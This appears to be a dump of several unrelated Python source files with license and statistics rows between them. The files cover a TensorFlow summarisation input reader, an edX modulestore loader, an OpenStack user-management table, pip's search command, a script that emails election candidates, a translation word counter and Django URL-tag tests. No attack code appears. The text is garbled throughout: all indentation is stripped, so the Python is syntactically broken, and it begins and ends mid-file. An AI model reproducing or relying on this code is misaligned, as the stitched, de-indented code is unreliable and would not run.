"""Fill input queue with ModelInput."""
start_id = self._vocab.WordToId(data.SENTENCE_START)
end_id = self._vocab.WordToId(data.SENTENCE_END)
pad_id = self._vocab.WordToId(data.PAD_TOKEN)
input_gen = self._TextGenerator(data.ExampleGen(self._data_path))
while True:
(article, abstract) = six.next(input_gen)
article_sentences = [sent.strip() for sent in
data.ToSentences(article, include_token=False)]
abstract_sentences = [sent.strip() for sent in
data.ToSentences(abstract, include_token=False)]
enc_inputs = []
# Use the <s> as the <GO> symbol for decoder inputs.
dec_inputs = [start_id]
# Convert first N sentences to word IDs, stripping existing <s> and </s>.
for i in xrange(min(self._max_article_sentences,
len(article_sentences))):
enc_inputs += data.GetWordIds(article_sentences[i], self._vocab)
for i in xrange(min(self._max_abstract_sentences,
len(abstract_sentences))):
dec_inputs += data.GetWordIds(abstract_sentences[i], self._vocab)
# Filter out too-short input
if (len(enc_inputs) < self._hps.min_input_len or
len(dec_inputs) < self._hps.min_input_len):
tf.logging.warning('Drop an example - too short.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we're not truncating input, throw out too-long input
if not self._truncate_input:
if (len(enc_inputs) > self._hps.enc_timesteps or
len(dec_inputs) > self._hps.dec_timesteps):
tf.logging.warning('Drop an example - too long.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we are truncating input, do so if necessary
else:
if len(enc_inputs) > self._hps.enc_timesteps:
enc_inputs = enc_inputs[:self._hps.enc_timesteps]
if len(dec_inputs) > self._hps.dec_timesteps:
dec_inputs = dec_inputs[:self._hps.dec_timesteps]
# targets is dec_inputs without <s> at beginning, plus </s> at end
targets = dec_inputs[1:]
targets.append(end_id)
# Now len(enc_inputs) should be <= enc_timesteps, and
# len(targets) = len(dec_inputs) should be <= dec_timesteps
enc_input_len = len(enc_inputs)
dec_output_len = len(targets)
# Pad if necessary
while len(enc_inputs) < self._hps.enc_timesteps:
enc_inputs.append(pad_id)
while len(dec_inputs) < self._hps.dec_timesteps:
dec_inputs.append(end_id)
while len(targets) < self._hps.dec_timesteps:
targets.append(end_id)
element = ModelInput(enc_inputs, dec_inputs, targets, enc_input_len,
dec_output_len, ' '.join(article_sentences),
' '.join(abstract_sentences))
self._input_queue.put(element)
def _FillBucketInputQueue(self):
"""Fill bucketed batches into the bucket_input_queue."""
while True:
inputs = []
for _ in xrange(self._hps.batch_size * BUCKET_CACHE_BATCH):
inputs.append(self._input_queue.get())
if self._bucketing:
inputs = sorted(inputs, key=lambda inp: inp.enc_len)
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i+self._hps.batch_size])
shuffle(batches)
for b in batches:
self._bucket_input_queue.put(b)
def _WatchThreads(self):
"""Watch the daemon input threads and restart if dead."""
while True:
time.sleep(60)
input_threads = []
for t in self._input_threads:
if t.is_alive():
input_threads.append(t)
else:
tf.logging.error('Found input thread dead.')
new_t = Thread(target=self._FillInputQueue)
input_threads.append(new_t)
input_threads[-1].daemon = True
input_threads[-1].start()
self._input_threads = input_threads
bucketing_threads = []
for t in self._bucketing_threads:
if t.is_alive():
bucketing_threads.append(t)
else:
tf.logging.error('Found bucketing thread dead.')
new_t = Thread(target=self._FillBucketInputQueue)
bucketing_threads.append(new_t)
bucketing_threads[-1].daemon = True
bucketing_threads[-1].start()
self._bucketing_threads = bucketing_threads
def _TextGenerator(self, example_gen):
"""Generates article and abstract text from tf.Example."""
while True:
e = six.next(example_gen)
try:
article_text = self._GetExFeatureText(e, self._article_key)
abstract_text = self._GetExFeatureText(e, self._abstract_key)
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
yield (article_text, abstract_text)
def _GetExFeatureText(self, ex, key):
"""Extract text for a feature from td.Example.
Args:
ex: tf.Example.
key: key of the feature to be extracted.
Returns:
feature: a feature text extracted.
"""
return ex.features.feature[key].bytes_list.value[0]
| apache-2.0 | 5,198,700,568,311,423,000 | 38.245283 | 80 | 0.637115 | false |
jelugbo/hebs_master | common/lib/xmodule/xmodule/modulestore/django.py | 17 | 6349 | """
Module that provides a connection to the ModuleStore specified in the django settings.
Passes settings.MODULESTORE as kwargs to MongoModuleStore
"""
from __future__ import absolute_import
from importlib import import_module
from django.conf import settings
if not settings.configured:
settings.configure()
from django.core.cache import get_cache, InvalidCacheBackendError
import django.utils
import re
import threading
from xmodule.util.django import get_current_request_hostname
import xmodule.modulestore # pylint: disable=unused-import
from xmodule.modulestore.mixed import MixedModuleStore
from xmodule.modulestore.draft_and_published import BranchSettingMixin
from xmodule.contentstore.django import contentstore
import xblock.reference.plugins
# We may not always have the request_cache module available
try:
from request_cache.middleware import RequestCache
HAS_REQUEST_CACHE = True
except ImportError:
HAS_REQUEST_CACHE = False
ASSET_IGNORE_REGEX = getattr(settings, "ASSET_IGNORE_REGEX", r"(^\._.*$)|(^\.DS_Store$)|(^.*~$)")
def load_function(path):
"""
Load a function by name.
path is a string of the form "path.to.module.function"
returns the imported python object `function` from `path.to.module`
"""
module_path, _, name = path.rpartition('.')
return getattr(import_module(module_path), name)
def create_modulestore_instance(engine, content_store, doc_store_config, options, i18n_service=None, fs_service=None):
"""
This will return a new instance of a modulestore given an engine and options
"""
class_ = load_function(engine)
_options = {}
_options.update(options)
FUNCTION_KEYS = ['render_template']
for key in FUNCTION_KEYS:
if key in _options and isinstance(_options[key], basestring):
_options[key] = load_function(_options[key])
if HAS_REQUEST_CACHE:
request_cache = RequestCache.get_request_cache()
else:
request_cache = None
try:
metadata_inheritance_cache = get_cache('mongo_metadata_inheritance')
except InvalidCacheBackendError:
metadata_inheritance_cache = get_cache('default')
if issubclass(class_, MixedModuleStore):
_options['create_modulestore_instance'] = create_modulestore_instance
if issubclass(class_, BranchSettingMixin):
_options['branch_setting_func'] = _get_modulestore_branch_setting
return class_(
contentstore=content_store,
metadata_inheritance_cache_subsystem=metadata_inheritance_cache,
request_cache=request_cache,
xblock_mixins=getattr(settings, 'XBLOCK_MIXINS', ()),
xblock_select=getattr(settings, 'XBLOCK_SELECT_FUNCTION', None),
doc_store_config=doc_store_config,
i18n_service=i18n_service or ModuleI18nService(),
fs_service=fs_service or xblock.reference.plugins.FSService(),
**_options
)
# A singleton instance of the Mixed Modulestore
_MIXED_MODULESTORE = None
def modulestore():
"""
Returns the Mixed modulestore
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
if _MIXED_MODULESTORE is None:
_MIXED_MODULESTORE = create_modulestore_instance(
settings.MODULESTORE['default']['ENGINE'],
contentstore(),
settings.MODULESTORE['default'].get('DOC_STORE_CONFIG', {}),
settings.MODULESTORE['default'].get('OPTIONS', {})
)
return _MIXED_MODULESTORE
def clear_existing_modulestores():
"""
Clear the existing modulestore instances, causing
them to be re-created when accessed again.
This is useful for flushing state between unit tests.
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
_MIXED_MODULESTORE = None
class ModuleI18nService(object):
"""
Implement the XBlock runtime "i18n" service.
Mostly a pass-through to Django's translation module.
django.utils.translation implements the gettext.Translations interface (it
has ugettext, ungettext, etc), so we can use it directly as the runtime
i18n service.
"""
def __getattr__(self, name):
return getattr(django.utils.translation, name)
def strftime(self, *args, **kwargs):
"""
A locale-aware implementation of strftime.
"""
# This is the wrong place to import this function. I'm putting it here
# because the xmodule test suite can't import this module, because
# Django is not available in that suite. This function isn't called in
# that suite, so this hides the import so the test won't fail.
#
# As I said, this is wrong. But Cale says this code will soon be
# refactored to a place that will be right, and the code can be made
# right there. If you are reading this comment after April 1, 2014,
# then Cale was a liar.
from util.date_utils import strftime_localized
return strftime_localized(*args, **kwargs)
def _get_modulestore_branch_setting():
"""
Returns the branch setting for the module store from the current Django request if configured,
else returns the branch value from the configuration settings if set,
else returns None
The value of the branch setting is cached in a thread-local variable so it is not repeatedly recomputed
"""
def get_branch_setting():
"""
Finds and returns the branch setting based on the Django request and the configuration settings
"""
branch = None
hostname = get_current_request_hostname()
if hostname:
# get mapping information which is defined in configurations
mappings = getattr(settings, 'HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS', None)
# compare hostname against the regex expressions set of mappings which will tell us which branch to use
if mappings:
for key in mappings.iterkeys():
if re.match(key, hostname):
return mappings[key]
if branch is None:
branch = getattr(settings, 'MODULESTORE_BRANCH', None)
return branch
# leaving this in code structured in closure-friendly format b/c we might eventually cache this (again)
# using request_cache
return get_branch_setting()
| agpl-3.0 | 2,187,341,260,609,576,700 | 34.272222 | 118 | 0.685305 | false |
xuweiliang/Codelibrary | openstack_dashboard/dashboards/admin/users/tables.py | 1 | 7776 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template import defaultfilters
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import forms
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard import policy
from openstack_dashboard import record_action
ENABLE = 0
DISABLE = 1
KEYSTONE_V2_ENABLED = api.keystone.VERSIONS.active < 3
class CreateUserLink(tables.LinkAction):
name = "create"
verbose_name = _("Create User")
url = "horizon:admin:users:create"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (('admin', 'admin:create_grant'),
("admin", "admin:create_user"),
("admin", "admin:list_roles"),
("admin", "admin:list_projects"),)
def allowed(self, request, user):
return api.keystone.keystone_can_edit_user()
class EditUserLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "edit"
verbose_name = _("Edit")
url = "horizon:admin:users:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("admin", "admin:update_user"),
("admin", "admin:list_projects"),)
policy_target_attrs = (("user_id", "id"),)
def allowed(self, request, user):
return api.keystone.keystone_can_edit_user()
class ToggleEnabled(policy.PolicyTargetMixin, tables.BatchAction):
name = "toggle"
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Enable User",
u"Enable Users",
count
),
ungettext_lazy(
u"Disable User",
u"Disable Users",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Enabled User",
u"Enabled Users",
count
),
ungettext_lazy(
u"Disabled User",
u"Disabled Users",
count
),
)
classes = ("btn-toggle",)
policy_rules = (("admin", "admin:update_user"),)
policy_target_attrs = (("user_id", "id"),)
def allowed(self, request, user=None):
if not api.keystone.keystone_can_edit_user():
return False
self.enabled = True
if not user:
return self.enabled
self.enabled = user.enabled
if self.enabled:
self.current_present_action = DISABLE
else:
self.current_present_action = ENABLE
return True
def update(self, request, user=None):
super(ToggleEnabled, self).update(request, user)
if user and user.id == request.user.id:
self.attrs["disabled"] = "disabled"
def action(self, request, obj_id):
user_data = api.keystone.user_get(request, obj_id)
if obj_id == request.user.id:
msg = _('You cannot disable the user you are '
'currently logged in as.')
messages.info(request, msg)
api.nova.systemlogs_create(request, user_data.name,
record_action.TOGGLEUSER, result=False, detail=msg)
return
if self.enabled:
api.keystone.user_update_enabled(request, obj_id, False)
self.current_past_action = DISABLE
flag = 'Disable '
else:
api.keystone.user_update_enabled(request, obj_id, True)
self.current_past_action = ENABLE
flag = 'Enable '
objectname = flag + 'User'
api.nova.systemlogs_create(request, user_data.name,
objectname, result=True, detail='-')
class DeleteUsersAction(policy.PolicyTargetMixin, tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete User",
u"Delete Users",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted User",
u"Deleted Users",
count
)
policy_rules = (("admin", "admin:delete_user"),)
def allowed(self, request, datum):
SystemName=['glance', 'cinder', 'neutron', 'nova', 'admin', request.user.username]
self.result = True
self.detail = '-'
if datum is not None and datum.name in SystemName:
self.result = False
self.detail = _("Cannot allowed to delete user")
#if not api.keystone.keystone_can_edit_user() or \
# (datum and datum.id == request.user.id):
# return False
return False
return True
def delete(self, request, obj_id):
user_data = api.keystone.user_get(request, obj_id)
api.keystone.user_delete(request, obj_id)
class UserFilterAction(tables.FilterAction):
def filter(self, table, users, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
return [user for user in users
if q in user.name.lower()]
# if api.keystone.VERSIONS.active < 3:
# filter_type = "query"
# else:
# filter_type = "server"
# filter_choices = (("name", _("User Name ="), True),
# ("id", _("User ID ="), True),
# ("enabled", _("Enabled ="), True, _('e.g. Yes/No')))
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, user_id):
user_info = api.keystone.user_get(request, user_id, admin=True)
return user_info
class UsersTable(tables.DataTable):
STATUS_CHOICES = (
("true", True),
("false", False)
)
name = tables.Column('name', verbose_name=_('User Name'))
email = tables.Column('email', verbose_name=_('Email'),
filters=(lambda v: defaultfilters
.default_if_none(v, ""),
defaultfilters.escape,
defaultfilters.urlize)
)
# Default tenant is not returned from Keystone currently.
# default_tenant = tables.Column('default_tenant',
# verbose_name=_('Default Project'))
#id = tables.Column('id', verbose_name=_('User ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'),
status=True,
status_choices=STATUS_CHOICES,
filters=(defaultfilters.yesno,
defaultfilters.capfirst),
empty_value="False")
if api.keystone.VERSIONS.active >= 3:
domain_name = tables.Column('domain_name',
verbose_name=_('Domain Name'),
attrs={'data-type': 'uuid'})
class Meta(object):
name = "users"
verbose_name = _("Users")
row_actions = (EditUserLink, ToggleEnabled, DeleteUsersAction)
table_actions = (UserFilterAction, CreateUserLink, DeleteUsersAction)
row_class = UpdateRow
| apache-2.0 | 142,018,871,782,313,800 | 33.56 | 90 | 0.561214 | false |
ccellis/WHACK2016 | flask/lib/python2.7/site-packages/pip/commands/search.py | 344 | 4736 | import sys
import textwrap
import pip.download
from pip.basecommand import Command, SUCCESS
from pip.util import get_terminal_size
from pip.log import logger
from pip.backwardcompat import xmlrpclib, reduce, cmp
from pip.exceptions import CommandError
from pip.status_codes import NO_MATCHES_FOUND
from pip._vendor import pkg_resources
from distutils.version import StrictVersion, LooseVersion
class SearchCommand(Command):
"""Search for PyPI packages whose name or summary contains <query>."""
name = 'search'
usage = """
%prog [options] <query>"""
summary = 'Search PyPI for packages.'
def __init__(self, *args, **kw):
super(SearchCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'--index',
dest='index',
metavar='URL',
default='https://pypi.python.org/pypi',
help='Base URL of Python Package Index (default %default)')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
if not args:
raise CommandError('Missing required argument (search query).')
query = args
index_url = options.index
pypi_hits = self.search(query, index_url)
hits = transform_hits(pypi_hits)
terminal_width = None
if sys.stdout.isatty():
terminal_width = get_terminal_size()[0]
print_results(hits, terminal_width=terminal_width)
if pypi_hits:
return SUCCESS
return NO_MATCHES_FOUND
def search(self, query, index_url):
pypi = xmlrpclib.ServerProxy(index_url)
hits = pypi.search({'name': query, 'summary': query}, 'or')
return hits
def transform_hits(hits):
"""
The list from pypi is really a list of versions. We want a list of
packages with the list of versions stored inline. This converts the
list from pypi into one we can use.
"""
packages = {}
for hit in hits:
name = hit['name']
summary = hit['summary']
version = hit['version']
score = hit['_pypi_ordering']
if score is None:
score = 0
if name not in packages.keys():
packages[name] = {'name': name, 'summary': summary, 'versions': [version], 'score': score}
else:
packages[name]['versions'].append(version)
# if this is the highest version, replace summary and score
if version == highest_version(packages[name]['versions']):
packages[name]['summary'] = summary
packages[name]['score'] = score
# each record has a unique name now, so we will convert the dict into a list sorted by score
package_list = sorted(packages.values(), key=lambda x: x['score'], reverse=True)
return package_list
def print_results(hits, name_column_width=25, terminal_width=None):
installed_packages = [p.project_name for p in pkg_resources.working_set]
for hit in hits:
name = hit['name']
summary = hit['summary'] or ''
if terminal_width is not None:
# wrap and indent summary to fit terminal
summary = textwrap.wrap(summary, terminal_width - name_column_width - 5)
summary = ('\n' + ' ' * (name_column_width + 3)).join(summary)
line = '%s - %s' % (name.ljust(name_column_width), summary)
try:
logger.notify(line)
if name in installed_packages:
dist = pkg_resources.get_distribution(name)
logger.indent += 2
try:
latest = highest_version(hit['versions'])
if dist.version == latest:
logger.notify('INSTALLED: %s (latest)' % dist.version)
else:
logger.notify('INSTALLED: %s' % dist.version)
logger.notify('LATEST: %s' % latest)
finally:
logger.indent -= 2
except UnicodeEncodeError:
pass
def compare_versions(version1, version2):
try:
return cmp(StrictVersion(version1), StrictVersion(version2))
# in case of abnormal version number, fall back to LooseVersion
except ValueError:
pass
try:
return cmp(LooseVersion(version1), LooseVersion(version2))
except TypeError:
# certain LooseVersion comparions raise due to unorderable types,
# fallback to string comparison
return cmp([str(v) for v in LooseVersion(version1).version],
[str(v) for v in LooseVersion(version2).version])
def highest_version(versions):
return reduce((lambda v1, v2: compare_versions(v1, v2) == 1 and v1 or v2), versions)
| bsd-3-clause | -1,124,570,996,603,187,500 | 34.878788 | 102 | 0.603463 | false |
frabcus/mpcv | bin/parl.2017-06-08/01-all-candidates.py | 1 | 2347 | #!/usr/bin/env python3
import sys
import os
import collections
import datetime
import flask_mail
import boto.s3.key
sys.path.append(os.getcwd())
import app
import identity
import lookups
app.app.config['SERVER_NAME'] = 'cv.democracyclub.org.uk'
# Get list of when last sent
last_sent_by_email = lookups.candidate_mail_last_sent(app.app.config)
with app.app.app_context():
for constituency in lookups.all_constituencies(app.app.config):
for candidate in constituency:
if candidate['id'] in [5819]:
print("unsubscribed", candidate)
continue
if candidate['has_cv']:
continue
if not candidate['email']:
continue
# Only mail to ones we haven't mailed recently
if candidate['email'] in last_sent_by_email:
back_to = datetime.datetime.now() - datetime.timedelta(days=14)
last_sent = last_sent_by_email[candidate['email']]
if last_sent > back_to:
print("skipping too recent", candidate['email'], last_sent, ">", back_to)
continue
link = identity.generate_upload_url(app.app.secret_key, candidate['id'])
body = '''Hi!
Great that you're standing for Parliament again!
At the last General Election, we found voters love to
learn more about you by seeing the career history on your
CV.
To share your CV with voters, follow this link.
{link}
If you're having trouble, reply to this email with an
attachment!
Many thanks,
Francis
Volunteer, Democracy Club CVs
http://cv.democracyclub.org.uk/
'''.format(link=link, linkedin_url=candidate['linkedin_url'], name=candidate['name'])
print("sending to: " + candidate['email'])
# For debugging:
#print("\n" + body)
#candidate['email'] = '[email protected]'
msg = flask_mail.Message(body=body,
subject="Your voters would like to see your CV!",
sender=("Democracy Club CVs", "[email protected]"),
recipients=[
(candidate['name'], candidate['email'])
]
)
app.mail.send(msg)
lookups.candidate_mail_sent(app.app.config, candidate['email'])
| agpl-3.0 | -7,220,414,835,251,594,000 | 28.3375 | 93 | 0.597358 | false |
pavels/pootle | pootle/core/utils/wordcount.py | 4 | 4873 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import re
re._MAXCACHE = 1000
remove = re.compile(u"[\.]+", re.U) # dots
delimiters = re.compile(u"[\W]+", re.U) # anything except a-z, A-Z and _
delimiters_begin = re.compile(u"^[\W]+",
re.U) # anything except a-z, A-Z and _
delimiters_end = re.compile(u"[\W]+$", re.U) # anything except a-z, A-Z and _
english_date = re.compile(
u"(^|\W)(January|February|March|April|May|June|July|August|September|"
u"October|November|December)\s+\d{1,2},\s+(?:\d{2})?\d{2}(\W|$)",
re.U
)
escaped_xmltag_regex = re.compile(u'(<\/?[\w]+.*?>)', re.U)
xmltag_regex = re.compile(u'(<\/?[\w]+.*?>)', re.U)
java_format_regex = re.compile(u'(\\\{\d+\\\}|\{\d+\})', re.U)
template_format_regex = re.compile(u'(\$\{[\w\.\:]+\})', re.U)
android_format_regex = re.compile(u'(%\d\$\w)', re.U)
sprintf_regex = re.compile(u'(%[\d]*(?:.\d+)*(?:h|l|I|I32|I64)*[cdiouxefgns])',
re.U)
objective_c_regex = re.compile(u'(%@)', re.U)
dollar_sign_regex = re.compile(u'(\$[\w\d]+?\$)', re.U)
persent_sign_regex = re.compile(u'(\%[\w\d]+?\%)', re.U)
newline_regex = re.compile(u'(\{\\\n\})', re.U)
escaping_sqc_regex = re.compile(u'(\\\+[rnt])', re.U)
xml_entities_regex = re.compile(u'(&#\d+;|&\w+;)', re.U)
product_names_regex = re.compile(
u"(Evernote International|Evernote Food|Evernote Hello|Evernote Clearly|"
u"Evernote Business|Skitch|Evernote®?|Food|^Hello$|Clearly)",
re.U
)
shortcuts_regex = re.compile(u'(Ctrl\+\w$|Shift\+\w$|Alt\+\w$)', re.U)
shortcuts_modifier_regex = re.compile(u'(Ctrl\+$|Shift\+$|Alt\+$)', re.U)
hanging_symbols_regex = \
re.compile(u'(^[^\w\&]\s|\s[^\w\&]\s|\s[^\w\&]$|^[^\w\&]$)', re.U)
def find_placeholders(aref, regex, cls=''):
# regex is compiled re object with pattern surrounded by "()"
i = 0
while i < len(aref):
chunk = aref[i]
if not chunk['translate']:
i += 1
else:
subchunks = regex.split(chunk['string'])
a = []
translate = False
for subchunk in subchunks:
translate = not translate
a.append({
'translate': translate,
'string': subchunk,
'class': cls
})
aref[i:i+1] = a
i += len(a)
def wordcount(string):
string = re.sub('\n', '{\\n}', string)
chunks = [{
'translate': 1,
'string': u'%s' % string,
}]
# FIXME: provide line continuations to fit lines below 80 chars
# Escaped XML tags (used in some strings)
find_placeholders(chunks, escaped_xmltag_regex)
# XML tags
find_placeholders(chunks, xmltag_regex)
# Java format and it's escaped version
find_placeholders(chunks, java_format_regex)
# Template format
find_placeholders(chunks, template_format_regex)
# Android format
find_placeholders(chunks, android_format_regex)
# sprintf
find_placeholders(chunks, sprintf_regex)
# Objective C style placeholders
find_placeholders(chunks, objective_c_regex)
# Dollar sign placeholders
find_placeholders(chunks, dollar_sign_regex)
# Percent sign placeholders
find_placeholders(chunks, persent_sign_regex)
# '{\n}' newline marker
find_placeholders(chunks, newline_regex)
# Escaping sequences (\n, \r, \t)
find_placeholders(chunks, escaping_sqc_regex)
# XML entities
find_placeholders(chunks, xml_entities_regex)
# Product names
find_placeholders(chunks, product_names_regex)
# Shortcuts
find_placeholders(chunks, shortcuts_regex)
# Shortcut modifiers
find_placeholders(chunks, shortcuts_modifier_regex)
# Find patterns that are not counted as words in Trados
# Hanging symbols (excluding a-z, _ and &)
find_placeholders(chunks, hanging_symbols_regex, 'dont-count')
return _count_words(chunks)
def _count_words(aref):
# These rules are based on observed Trados 2007 word calculation behavior
n = 0
for chunk in aref:
if chunk['translate']:
s = chunk['string']
# Replace the date with just the month name (i.e. count as a single
# word)
s = english_date.sub(u'\g<1>\g<2>\g<3>', s)
s = remove.sub(u'', s)
s = delimiters_begin.sub(u'', s)
s = delimiters_end.sub(u'', s)
a = delimiters.split(s)
if len(a) > 1 and a[-1] == u'':
a.pop()
if len(a) == 1 and a[0] == u'':
a.pop()
n += len(a)
return n
| gpl-3.0 | 2,861,978,391,407,678,500 | 31.697987 | 79 | 0.579023 | false |
wkschwartz/django | tests/template_tests/syntax_tests/test_url.py | 34 | 11815 | from django.template import RequestContext, TemplateSyntaxError
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.urls import NoReverseMatch, resolve
from ..utils import setup
@override_settings(ROOT_URLCONF='template_tests.urls')
class UrlTagTests(SimpleTestCase):
request_factory = RequestFactory()
# Successes
@setup({'url01': '{% url "client" client.id %}'})
def test_url01(self):
output = self.engine.render_to_string('url01', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/')
@setup({'url02': '{% url "client_action" id=client.id action="update" %}'})
def test_url02(self):
output = self.engine.render_to_string('url02', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url02a': '{% url "client_action" client.id "update" %}'})
def test_url02a(self):
output = self.engine.render_to_string('url02a', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url02b': "{% url 'client_action' id=client.id action='update' %}"})
def test_url02b(self):
output = self.engine.render_to_string('url02b', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url02c': "{% url 'client_action' client.id 'update' %}"})
def test_url02c(self):
output = self.engine.render_to_string('url02c', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url03': '{% url "index" %}'})
def test_url03(self):
output = self.engine.render_to_string('url03')
self.assertEqual(output, '/')
@setup({'url04': '{% url "named.client" client.id %}'})
def test_url04(self):
output = self.engine.render_to_string('url04', {'client': {'id': 1}})
self.assertEqual(output, '/named-client/1/')
@setup({'url05': '{% url "метка_оператора" v %}'})
def test_url05(self):
output = self.engine.render_to_string('url05', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url06': '{% url "метка_оператора_2" tag=v %}'})
def test_url06(self):
output = self.engine.render_to_string('url06', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url08': '{% url "метка_оператора" v %}'})
def test_url08(self):
output = self.engine.render_to_string('url08', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url09': '{% url "метка_оператора_2" tag=v %}'})
def test_url09(self):
output = self.engine.render_to_string('url09', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url10': '{% url "client_action" id=client.id action="two words" %}'})
def test_url10(self):
output = self.engine.render_to_string('url10', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/two%20words/')
@setup({'url11': '{% url "client_action" id=client.id action="==" %}'})
def test_url11(self):
output = self.engine.render_to_string('url11', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/==/')
@setup({'url12': '{% url "client_action" id=client.id action="!$&\'()*+,;=~:@," %}'})
def test_url12(self):
output = self.engine.render_to_string('url12', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/!$&'()*+,;=~:@,/')
@setup({'url13': '{% url "client_action" id=client.id action=arg|join:"-" %}'})
def test_url13(self):
output = self.engine.render_to_string('url13', {'client': {'id': 1}, 'arg': ['a', 'b']})
self.assertEqual(output, '/client/1/a-b/')
@setup({'url14': '{% url "client_action" client.id arg|join:"-" %}'})
def test_url14(self):
output = self.engine.render_to_string('url14', {'client': {'id': 1}, 'arg': ['a', 'b']})
self.assertEqual(output, '/client/1/a-b/')
@setup({'url15': '{% url "client_action" 12 "test" %}'})
def test_url15(self):
output = self.engine.render_to_string('url15')
self.assertEqual(output, '/client/12/test/')
@setup({'url18': '{% url "client" "1,2" %}'})
def test_url18(self):
output = self.engine.render_to_string('url18')
self.assertEqual(output, '/client/1,2/')
@setup({'url19': '{% url named_url client.id %}'})
def test_url19(self):
output = self.engine.render_to_string(
'url19', {'client': {'id': 1}, 'named_url': 'client'}
)
self.assertEqual(output, '/client/1/')
@setup({'url20': '{% url url_name_in_var client.id %}'})
def test_url20(self):
output = self.engine.render_to_string('url20', {'client': {'id': 1}, 'url_name_in_var': 'named.client'})
self.assertEqual(output, '/named-client/1/')
@setup({'url21': '{% autoescape off %}'
'{% url "client_action" id=client.id action="!$&\'()*+,;=~:@," %}'
'{% endautoescape %}'})
def test_url21(self):
output = self.engine.render_to_string('url21', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/!$&\'()*+,;=~:@,/')
# Failures
@setup({'url-fail01': '{% url %}'})
def test_url_fail01(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail01')
@setup({'url-fail02': '{% url "no_such_view" %}'})
def test_url_fail02(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail02')
@setup({'url-fail03': '{% url "client" %}'})
def test_url_fail03(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail03')
@setup({'url-fail04': '{% url "view" id, %}'})
def test_url_fail04(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail04')
@setup({'url-fail05': '{% url "view" id= %}'})
def test_url_fail05(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail05')
@setup({'url-fail06': '{% url "view" a.id=id %}'})
def test_url_fail06(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail06')
@setup({'url-fail07': '{% url "view" a.id!id %}'})
def test_url_fail07(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail07')
@setup({'url-fail08': '{% url "view" id="unterminatedstring %}'})
def test_url_fail08(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail08')
@setup({'url-fail09': '{% url "view" id=", %}'})
def test_url_fail09(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail09')
@setup({'url-fail11': '{% url named_url %}'})
def test_url_fail11(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail11')
@setup({'url-fail12': '{% url named_url %}'})
def test_url_fail12(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail12', {'named_url': 'no_such_view'})
@setup({'url-fail13': '{% url named_url %}'})
def test_url_fail13(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail13', {'named_url': 'template_tests.views.client'})
@setup({'url-fail14': '{% url named_url id, %}'})
def test_url_fail14(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail14', {'named_url': 'view'})
@setup({'url-fail15': '{% url named_url id= %}'})
def test_url_fail15(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail15', {'named_url': 'view'})
@setup({'url-fail16': '{% url named_url a.id=id %}'})
def test_url_fail16(self):
